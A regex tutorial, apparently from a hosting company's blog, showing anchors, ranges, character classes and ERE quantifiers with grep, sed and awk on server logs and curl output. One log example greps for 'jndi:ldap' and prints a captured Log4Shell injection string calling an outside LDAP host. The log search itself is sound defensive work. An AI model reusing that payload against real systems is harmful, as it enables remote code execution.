17 December 2021

A regular expression, or regex, is a sequence of characters that represents a pattern. Regular expressions are commonly used in code and text processing. For instance, you can use a regex to validate user input or to filter specific data from a log file.

Regular expressions should not be confused with globbing. A glob is also a sequence of characters that represents a pattern, but it is used for file name expansion on the command line. As a simple example of globbing, you can list all PHP files in a directory with the command ls *.php. The glob in the command is the asterisk, which on its own matches zero or more characters. In a regex the asterisk is a quantifier: it matches zero or more instances of the preceding character. There are a few differences like this, and it is easy to get them muddled up.
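To make the difference concrete, here is a small sketch that runs an asterisk through both mechanisms. The file names and strings are made up for illustration, and glob_matches is a hypothetical helper; it uses case because that applies the shell's own glob matching without touching the file system.

```shell
#!/bin/sh
# Glob: the asterisk stands on its own and matches any run of characters.
# glob_matches is a hypothetical helper used only for this illustration.
glob_matches() {
    case "$1" in
        *.php) echo yes ;;
        *)     echo no ;;
    esac
}

glob_matches index.php     # prints "yes"
glob_matches index.html    # prints "no"

# Regex: the asterisk repeats the preceding character zero or more times,
# so "ab*c" matches "ac", "abc" and "abbc" but not "abd".
regex_count=$(printf 'ac\nabc\nabbc\nabd\n' | grep -c 'ab*c')
echo "$regex_count"        # prints "3"
```

Note that the regex matched “ac”, which contains no “b” at all. A glob such as ab*c would match that string too, but for a different reason: the glob asterisk swallows any characters between “ab” and “c”, whereas the regex asterisk only repeats the “b”.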

Another thing to be aware of is that there are two types of regular expressions: basic (BRE) and extended (ERE). As the names suggest, extended regular expressions have a few extra options. Utilities such as grep and sed use basic regular expressions by default. However, with both you can use the -E option to enable extended regular expressions.
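As a rough illustration of what the -E option changes, the sketch below runs the same pattern through grep twice. It uses the question mark, which is covered further down in this article, and two made-up input lines. The behaviour shown is what I would expect from a POSIX-style grep such as GNU grep.

```shell
#!/bin/sh
# In a basic regular expression the question mark is an ordinary character,
# so this pattern only matches the literal text "colou?r".
# grep -c exits non-zero when nothing matches, hence the "|| true".
bre_count=$(printf 'color\ncolour\n' | grep -c 'colou?r' || true)

# With -E the question mark becomes a quantifier ("zero or one u").
ere_count=$(printf 'color\ncolour\n' | grep -Ec 'colou?r')

echo "BRE: $bre_count, ERE: $ere_count"    # prints "BRE: 0, ERE: 2"
```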

Basic regular expressions

Anchor characters

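The caret (^) and dollar sign ($) anchor a pattern to the start and end of a line. You can use the caret to get lines in a file that start with a certain string, such as a date or IP address. In the command below the pattern is quoted so that the shell leaves it alone, the dots are escaped with a backslash so that they match literal dots, and the trailing space prevents a match on longer addresses such as 1.2.3.45:

# grep '^1\.2\.3\.4 ' /var/log/httpd/example.log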
1.2.3.4 - - [14/Dec/2021:04:55:27 +0000] "GET /wp-login.php HTTP/1.1" 403 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...

Or, on a RHEL-based system you can count the number of AMD64 packages by looking at the end of the package names. Here, I list all packages on my system and then pipe the output to a grep command that counts the number of lines that end with the string “x86_64”:

# rpm -qa | grep -c 'x86_64$'
541

And you can also use both anchors. For instance, this is a quick way to delete empty lines using sed. The command matches any lines in the file data that start and end with nothing (i.e. there is nothing between the caret and dollar sign):

$ sed '/^$/d' data
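If you want to try the anchors without a log file or package database to hand, the following sketch uses a few made-up lines instead. The sample_data function is a hypothetical stand-in for a real file.

```shell
#!/bin/sh
# Hypothetical sample input: three lines of text separated by empty lines.
sample_data() {
    printf 'alpha one\n\nbeta two\n\none alpha\n'
}

# Lines that start with "alpha".
sample_data | grep '^alpha'    # prints "alpha one"

# Lines that end with "alpha".
sample_data | grep 'alpha$'    # prints "one alpha"

# Count the empty lines, then delete them.
sample_data | grep -c '^$'     # prints "2"
sample_data | sed '/^$/d'      # prints the three non-empty lines
```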

The dot and asterisk

A dot matches any single character. For instance, here I look for lines in a log file where the first field matches the pattern “^2021-12-1.$”:

# awk '$1 ~ /^2021-12-1.$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

If you are an eagle-eyed reader then you might have noticed that the regex is more or less redundant. The pattern “2021-12-1” would return the same set of results. The difference is that the pattern “^2021-12-1.$” makes sure that you only match lines that start with “2021-12-1” plus a single character. It would ignore any malformed date fields.
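The difference only shows up when the input contains malformed fields. Here is a sketch with three invented log lines (they are not taken from a real fail2ban log) that compares the two patterns:

```shell
#!/bin/sh
# Hypothetical log lines: one well-formed date and two malformed first fields.
sample_log() {
    printf '%s\n' \
        '2021-12-10 00:00:06,495 INFO ok' \
        '2021-12-105 00:00:07,001 INFO extra digit' \
        'x2021-12-11 00:00:08,123 INFO stray prefix'
}

# Unanchored: all three first fields contain "2021-12-1" somewhere.
sample_log | awk '$1 ~ /2021-12-1/ {print $1}'

# Anchored with a dot: only a field that is exactly "2021-12-1" plus one
# character gets through.
sample_log | awk '$1 ~ /^2021-12-1.$/ {print $1}'    # prints "2021-12-10"
```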

The dot is often used in combination with the asterisk, which is a quantifier that matches the preceding character zero or more times. Together, “.*” matches any run of characters, including none. You can use this to grep multiple strings on a single line. For instance, here I look for lines containing the strings “14/Dec” and “jndi:ldap” (with anything in between the two patterns):

# grep "14/Dec.*jndi:ldap" /var/log/httpd/example.log
112.74.52.90 - - [14/Dec/2021:11:40:06 +0000] "GET / HTTP/1.1" 200 4917 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"
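One thing to keep in mind is that the order of the two strings matters: the pattern only matches when “14/Dec” appears before “jndi:ldap” on the line. The sketch below shows this with three shortened, made-up request lines (the example.invalid host is a placeholder):

```shell
#!/bin/sh
# Hypothetical, shortened request lines. Single quotes stop the shell from
# trying to expand the ${...} text.
sample_requests() {
    printf '%s\n' \
        '[14/Dec/2021:11:40:06] "GET / HTTP/1.1" "${jndi:ldap://example.invalid/a}"' \
        '[14/Dec/2021:11:41:10] "GET /index.php HTTP/1.1" "Mozilla/5.0"' \
        '[15/Dec/2021:09:12:44] "GET / HTTP/1.1" "${jndi:ldap://example.invalid/b}"'
}

# Only the first line has "14/Dec" followed later by "jndi:ldap".
sample_requests | grep -c '14/Dec.*jndi:ldap'            # prints "1"

# Swapping the two strings finds nothing, because no line has them in
# that order. grep -c exits non-zero on zero matches, hence "|| true".
sample_requests | grep -c 'jndi:ldap.*14/Dec' || true    # prints "0"
```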

Character ranges

A minute ago I argued that the pattern “^2021-12-1.$” is slightly better than “2021-12-1”. As things stand, though, the pattern would match a string like “2021-12-1x”. That is a problem, as our aim is to match (valid) dates.

We can further improve the pattern by making sure that the last character is a digit. To do so, you can use a range:

# awk '$1 ~ /^2021-12-1[0-9]$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

A range is defined in square brackets. In the above example I used “[0-9]”, which matches any single digit in the range 0 to 9. You can do the same with letters. For instance, “[a-z]” matches any lower case letter. It is worth pointing out that the latter pattern is case-sensitive. To match a letter in either lower or upper case you can use “[a-zA-Z]”. And to match any alphanumeric character you can use “[a-zA-Z0-9]”.

You can also list specific characters rather than a range. For instance, if you have a script that needs to check if a user answered “y” or “Y” to a question then you can use “[yY]”.
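In a script, such a check might look something like the sketch below. The is_yes function is a hypothetical helper, and the anchors make sure that the answer is a single character and nothing else.

```shell
#!/bin/sh
# is_yes is a hypothetical helper: it succeeds only if the answer is
# exactly "y" or "Y".
is_yes() {
    printf '%s\n' "$1" | grep -q '^[yY]$'
}

for answer in y Y n yes; do
    if is_yes "$answer"; then
        echo "$answer: accepted"
    else
        echo "$answer: rejected"
    fi
done
# prints:
# y: accepted
# Y: accepted
# n: rejected
# yes: rejected
```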

Negating ranges

You can also do the reverse. If you want to match any character that is not a digit then you can put a caret at the start of the range. So, “[^0-9]” matches any single character except a digit. Notice that the meaning of the caret symbol is now wildly different from its earlier meaning. Outside square brackets the caret denotes the start of a line.
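A common use for a negated range is to check that a string contains nothing but digits: if the string contains even one character that matches “[^0-9]” then it fails the test. The sketch below uses a hypothetical has_non_digit helper for that, and then combines both meanings of the caret in one pattern.

```shell
#!/bin/sh
# has_non_digit is a hypothetical helper: it succeeds if the argument
# contains at least one character that is not a digit.
has_non_digit() {
    printf '%s\n' "$1" | grep -q '[^0-9]'
}

for value in 2021 20x21; do
    if has_non_digit "$value"; then
        echo "$value: contains a non-digit"
    else
        echo "$value: digits only"
    fi
done
# prints:
# 2021: digits only
# 20x21: contains a non-digit

# Both carets in one pattern: the first anchors the match to the start of
# the line, the second negates the range. Only "x2021" starts with a
# non-digit.
printf '2021\nx2021\n20x21\n' | grep -c '^[^0-9]'    # prints "1"
```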

Special character classes

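There are a few special character classes you can use instead of ranges such as “[a-z]”. The name of a class is written between a pair of colons inside square brackets (for instance “[:alpha:]”), and the class itself goes inside the square brackets of a range. That is why you end up with double square brackets.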

Class        Matches                               Equivalent
[[:alpha:]]  Alphabetical characters               [a-zA-Z]
[[:alnum:]]  Alphabetical characters and integers  [a-zA-Z0-9]
[[:blank:]]  Space or tab characters               [ \t]
[[:digit:]]  Integers                              [0-9]
[[:lower:]]  Lower case alphabetical characters    [a-z]
[[:upper:]]  Upper case alphabetical characters    [A-Z]
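Here is a short sketch of a few of these classes in action. The input lines are invented; the second line consists of a space, a tab and another space, and the last line is empty.

```shell
#!/bin/sh
# Hypothetical sample input. Line 2 holds only blanks and line 5 is empty.
sample_lines() {
    printf 'abc123\n \t \nABC\n42\n\n'
}

# Lines made up of digits only.
sample_lines | grep '^[[:digit:]][[:digit:]]*$'    # prints "42"

# Lines made up of upper case letters only.
sample_lines | grep '^[[:upper:]][[:upper:]]*$'    # prints "ABC"

# Number of lines that contain at least one letter.
sample_lines | grep -c '[[:alpha:]]'               # prints "2"

# Delete lines that are empty or contain only spaces and tabs.
sample_lines | sed '/^[[:blank:]]*$/d'             # prints abc123, ABC and 42
```

The last command is a slightly more forgiving version of the sed '/^$/d' command from earlier, as it also removes lines that look empty but contain whitespace.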

Extended regular expressions

Extended regular expressions bring a few more meta characters to the party. As mentioned, you need to use the -E option if you want to use ERE in grep and sed.

The question mark

Like the asterisk, the question mark is a quantifier. But, whereas the asterisk matches the preceding character zero or more times, the question mark matches the preceding character zero or one time. To illustrate, if you want to check if a user entered “y”, “Y”, “yes” or “YES” then you can use the pattern “^[yY][eE]?[sS]?$”:

$ echo 'y' | grep -E "^[yY][eE]?[sS]?$"
y

$ echo 'YES' | grep -E "^[yY][eE]?[sS]?$"
YES

$ echo 'YES!' | grep -E "^[yY][eE]?[sS]?$"

Notice that the string “YES!” does not match. The reason is that I used the dollar sign to mark where the string ends.

Curly braces

Curly braces ({ and }) let you specify how many times the preceding element can appear. For instance, let’s say you want to check if a string uses the format YYYY-MM-DD. You can do that with the following pattern:

$ echo '2021-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"

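The second test failed because the string “21-12-15” doesn’t start with four digits. If you want to allow a two-digit year as well then you can give a minimum and a maximum. The pattern below accepts between two and four digits for the year (so, strictly speaking, a three-digit year would pass as well):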

$ echo '2021-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15
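A quick way to see exactly what the “{2,4}” bound accepts is to run a handful of candidates through the pattern. The matches_date function below is a hypothetical wrapper around the same grep command, and the candidate strings are made up.

```shell
#!/bin/sh
# matches_date is a hypothetical helper wrapping the {2,4} pattern.
matches_date() {
    printf '%s\n' "$1" |
        grep -Eq '^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$'
}

for candidate in 2021-12-15 21-12-15 021-12-15 1-12-15 20211-12-15; do
    if matches_date "$candidate"; then
        echo "$candidate: match"
    else
        echo "$candidate: no match"
    fi
done
# prints:
# 2021-12-15: match
# 21-12-15: match
# 021-12-15: match
# 1-12-15: no match
# 20211-12-15: no match
```

The three-digit year gets through because “{2,4}” means “at least two and at most four”, not “two or four”.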

Grouping expressions

An alternative way to validate the strings “2021-12-15” and “21-12-15” is to use grouping expressions. You can group part of a pattern using parentheses, and a quantifier that follows the group then applies to the group as a whole. So, you can use “(20)?” if the string may or may not start with “20”:

$ echo '2021-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15
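Groups are also a way to tighten up some of the earlier patterns. The pattern “^[yY][eE]?[sS]?$” makes the “e” and the “s” optional independently of each other, so it also accepts “ye” and “ys”. And a year matched with “{2,4}” may have three digits. The sketch below shows one possible way to address both with groups; is_yes_strict and is_date are hypothetical helper names.

```shell
#!/bin/sh
# "y" optionally followed by the whole group "es", in any case.
is_yes_strict() {
    printf '%s\n' "$1" | grep -Eq '^[yY]([eE][sS])?$'
}

# The year is one or two pairs of digits, so two or four digits in total.
is_date() {
    printf '%s\n' "$1" |
        grep -Eq '^([[:digit:]]{2}){1,2}-[[:digit:]]{2}-[[:digit:]]{2}$'
}

for answer in y YES ye ys; do
    if is_yes_strict "$answer"; then echo "$answer: yes"; else echo "$answer: no"; fi
done
# prints:
# y: yes
# YES: yes
# ye: no
# ys: no

for candidate in 2021-12-15 21-12-15 021-12-15; do
    if is_date "$candidate"; then echo "$candidate: match"; else echo "$candidate: no match"; fi
done
# prints:
# 2021-12-15: match
# 21-12-15: match
# 021-12-15: no match
```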

Pipes

The pipe symbol (|) functions as an OR operator. In other words, it lets you match one of multiple patterns. This can be handy to grep lines that contain one of multiple strings.

For instance, if you want to check if a website redirects correctly you can use a simple cURL command. That works, but the output contains lots of other information:

$ curl -IL catalyst2.com
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
date: Tue, 14 Dec 2021 15:04:41 GMT
location: https://catalyst2.com/
x-frame-options: SAMEORIGIN

HTTP/2 301 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
expires: Mon, 13 Dec 2021 14:11:46 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://www.catalyst2.com/
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

HTTP/2 200 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
link: <https://www.catalyst2.com/wp-json/>; rel="https://api.w.org/"
link: <https://www.catalyst2.com/wp-json/wp/v2/pages/5>; rel="alternate"; type="application/json"
link: <https://www.catalyst2.com/>; rel=shortlink
etag: "24284-1639400931;;;"
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

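To get just the information you are interested in you can grep lines that start with either “HTTP” or “location”. The two alternatives are grouped in parentheses so that the caret applies to both of them, and the -i option makes the match case-insensitive:

$ curl --silent -IL catalyst2.com | grep -Ei '^(http|location)'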
HTTP/1.1 301 Moved Permanently
location: https://catalyst2.com/
HTTP/2 301 
location: https://www.catalyst2.com/
HTTP/2 200
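When you combine a pipe with an anchor it is worth remembering that the pipe splits the whole pattern in two. In “^http|location” the caret belongs to “http” only, so “location” may appear anywhere on the line. The sketch below shows the difference using a few saved, made-up response headers (the x-original-location header is invented for the purpose), so it runs without network access.

```shell
#!/bin/sh
# Hypothetical response headers, saved so the example runs offline.
sample_headers() {
    printf '%s\n' \
        'HTTP/1.1 301 Moved Permanently' \
        'location: https://example.com/' \
        'x-original-location: /old' \
        'HTTP/2 200' \
        'content-type: text/html'
}

# Without a group the caret only anchors "http", so the line that merely
# contains "location" is counted as well.
sample_headers | grep -Eic '^http|location'      # prints "4"

# With a group the caret applies to both alternatives.
sample_headers | grep -Eic '^(http|location)'    # prints "3"
```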